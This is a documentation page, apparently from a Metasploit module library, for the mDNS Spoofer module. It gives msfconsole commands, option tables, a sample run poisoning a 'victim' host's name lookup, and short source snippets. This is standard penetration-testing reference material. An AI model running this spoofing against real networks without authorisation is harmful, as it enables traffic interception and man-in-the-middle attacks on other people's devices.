mDNS Spoofer - Metasploit
This page contains detailed information about how to use the auxiliary/spoof/mdns/mdns_response metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: mDNS Spoofer
Module: auxiliary/spoof/mdns/mdns_response
Source code: modules/auxiliary/spoof/mdns/mdns_response.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address (assuming the request matches our regex).
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/spoof/mdns/mdns_response
msf auxiliary(mdns_response) > show targets
... a list of targets ...
msf auxiliary(mdns_response) > set TARGET target-id
msf auxiliary(mdns_response) > show options
... show and set options ...
msf auxiliary(mdns_response) > exploit
Knowledge Base
This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address (assuming the request matches our regex).
Vulnerable Application
To use mdns_response, be on a network with devices/applications that can make mDNS multicast requests on 5353/udp for A and AAAA record queries.
Verification Steps
use auxiliary/spoof/mdns/mdns_response
set INTERFACE network_iface
set SPOOFIP4 10.x.x.x
run
Options
The SPOOFIP4 option
IPv4 address with which to spoof A-record queries
set SPOOFIP4 [IPv4 address]
The SPOOFIP6 option
IPv6 address with which to spoof AAAA-record queries
set SPOOFIP6 [IPv6 address]
The REGEX option
Regex applied to the mDNS to determine if spoofed reply is sent
set REGEX [regex]
The TTL option
Time To Live for the spoofed response (in seconds)
set TTL [number of seconds]
Scenarios
msf > use auxiliary/spoof/mdns/mdns_response
msf auxiliary(mdns_response) > set SPOOFIP4 10.x.x.y
SPOOFIP4 => 10.x.x.y
msf auxiliary(mdns_response) > set INTERFACE en3
INTERFACE => en3
msf auxiliary(mdns_response) > run
[*] Auxiliary module execution completed
msf auxiliary(mdns_response) >
[*] mDNS spoofer started. Listening for mDNS requests with REGEX "(?-mix:.*)" ...
On Victim Machine
ping something.local
(IP address should resolve to spoofed address)
[+] 10.x.x.z mDNS - something.local. matches regex, responding with 10.x.x.y
Go back to menu.
Msfconsole Usage
Here is how the spoof/mdns/mdns_response auxiliary module looks in the msfconsole:
msf6 > use auxiliary/spoof/mdns/mdns_response
msf6 auxiliary(spoof/mdns/mdns_response) > show info
Name: mDNS Spoofer
Module: auxiliary/spoof/mdns/mdns_response
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Joe Testa <[email protected]>
James Lee <[email protected]>
Robin Francois <[email protected]>
Available actions:
Name Description
---- -----------
Service Run mDNS spoofing service
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
REGEX .* yes Regex applied to the mDNS to determine if spoofed reply is sent
SPOOFIP4 yes IPv4 address with which to spoof A-record queries
SPOOFIP6 no IPv6 address with which to spoof AAAA-record queries
TIMEOUT 500 yes The number of seconds to wait for new data
TTL 120 no Time To Live for the spoofed response (in seconds)
Description:
This module will listen for mDNS multicast requests on 5353/udp for
A and AAAA record queries, and respond with a spoofed IP address
(assuming the request matches our regex).
References:
https://tools.ietf.org/html/rfc6762
Module Options
This is a complete list of options available in the spoof/mdns/mdns_response auxiliary module:
msf6 auxiliary(spoof/mdns/mdns_response) > show options
Module options (auxiliary/spoof/mdns/mdns_response):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
REGEX .* yes Regex applied to the mDNS to determine if spoofed reply is sent
SPOOFIP4 yes IPv4 address with which to spoof A-record queries
SPOOFIP6 no IPv6 address with which to spoof AAAA-record queries
TIMEOUT 500 yes The number of seconds to wait for new data
TTL 120 no Time To Live for the spoofed response (in seconds)
Auxiliary action:
Name Description
---- -----------
Service Run mDNS spoofing service
Advanced Options
Here is a complete list of advanced options supported by the spoof/mdns/mdns_response auxiliary module:
msf6 auxiliary(spoof/mdns/mdns_response) > show advanced
Module advanced options (auxiliary/spoof/mdns/mdns_response):
Name Current Setting Required Description
---- --------------- -------- -----------
GATEWAY_PROBE_HOST 8.8.8.8 yes Send a TTL=1 random UDP datagram to this host to discover the default gateway's MAC
GATEWAY_PROBE_PORT no The port on GATEWAY_PROBE_HOST to send a random UDP probe to (random if 0 or unset)
SECRET 1297303073 yes A 32-bit cookie for probe requests.
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the spoof/mdns/mdns_response module can do:
msf6 auxiliary(spoof/mdns/mdns_response) > show actions
Auxiliary actions:
Name Description
---- -----------
Service Run mDNS spoofing service
Evasion Options
Here is the full list of possible evasion options supported by the spoof/mdns/mdns_response auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(spoof/mdns/mdns_response) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<VALUE> mDNS - <NAME> did not match REGEX "<REGEX>"
Here is a relevant code snippet related to the "<VALUE> mDNS - <NAME> did not match REGEX "<REGEX>"" error message:
78: qm = true
79: dns_pkt.question.each do |question|
80: name = question.qName
81: if datastore['REGEX'] != '.*'
82: unless name =~ /#{datastore['REGEX']}/i
83: vprint_status("#{rhost.to_s.ljust 16} mDNS - #{name} did not match REGEX \"#{datastore['REGEX']}\"")
84: next
85: end
86: end
87:
88: # Check if the query is the "QU" type, which implies that we need to send a unicast response, instead of a multicast response.
IP version is not 4 or 6. Failed to parse?
Here is a relevant code snippet related to the "IP version is not 4 or 6. Failed to parse?" error message:
165: :ip_proto => 0x11, # UDP
166: :body => udp
167: )
168: else
169: # Should never get here
170: print_error("IP version is not 4 or 6. Failed to parse?")
171: return
172: end
173: ip_pkt.recalc
174:
175: capture_sendto(ip_pkt, rhost.to_s, true)
Go back to menu.
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7877 Merged Pull Request: Added MDNS query spoofing service.
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/netbios/netbios_spoof
- auxiliary/server/dns/spoofhelper
- auxiliary/server/netbios_spoof_nat
- auxiliary/spoof/arp/arp_poisoning
- auxiliary/spoof/cisco/cdp
- auxiliary/spoof/cisco/dtp
- auxiliary/spoof/dns/bailiwicked_domain
- auxiliary/spoof/dns/bailiwicked_host
- auxiliary/spoof/dns/compare_results
- auxiliary/spoof/dns/native_spoofer
- auxiliary/spoof/llmnr/llmnr_response
- auxiliary/spoof/nbns/nbns_response
- auxiliary/spoof/replay/pcap_replay
- auxiliary/voip/sip_invite_spoof
- exploit/windows/fileformat/winrar_name_spoofing
- post/linux/manage/dns_spoofing
- post/osx/gather/password_prompt_spoof
- exploit/windows/imap/mdaemon_cram_md5
- exploit/windows/imap/mdaemon_fetch
- post/windows/gather/credentials/mdaemon_cred_collector
- auxiliary/dos/mdns/avahi_portzero
- auxiliary/scanner/mdns/query
- exploit/osx/mdns/upnp_location
- auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
- exploit/windows/browser/getgodm_http_response_bof
- exploit/windows/misc/apple_quicktime_rtsp_response
- exploit/windows/misc/talkative_response
- exploit/multi/misc/weblogic_deserialize_asyncresponseservice
Authors
- Joe Testa <jtesta[at]positronsecurity.com>
- James Lee <egypt[at]metasploit.com>
- Robin Francois <rof[at]navixia.com>
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.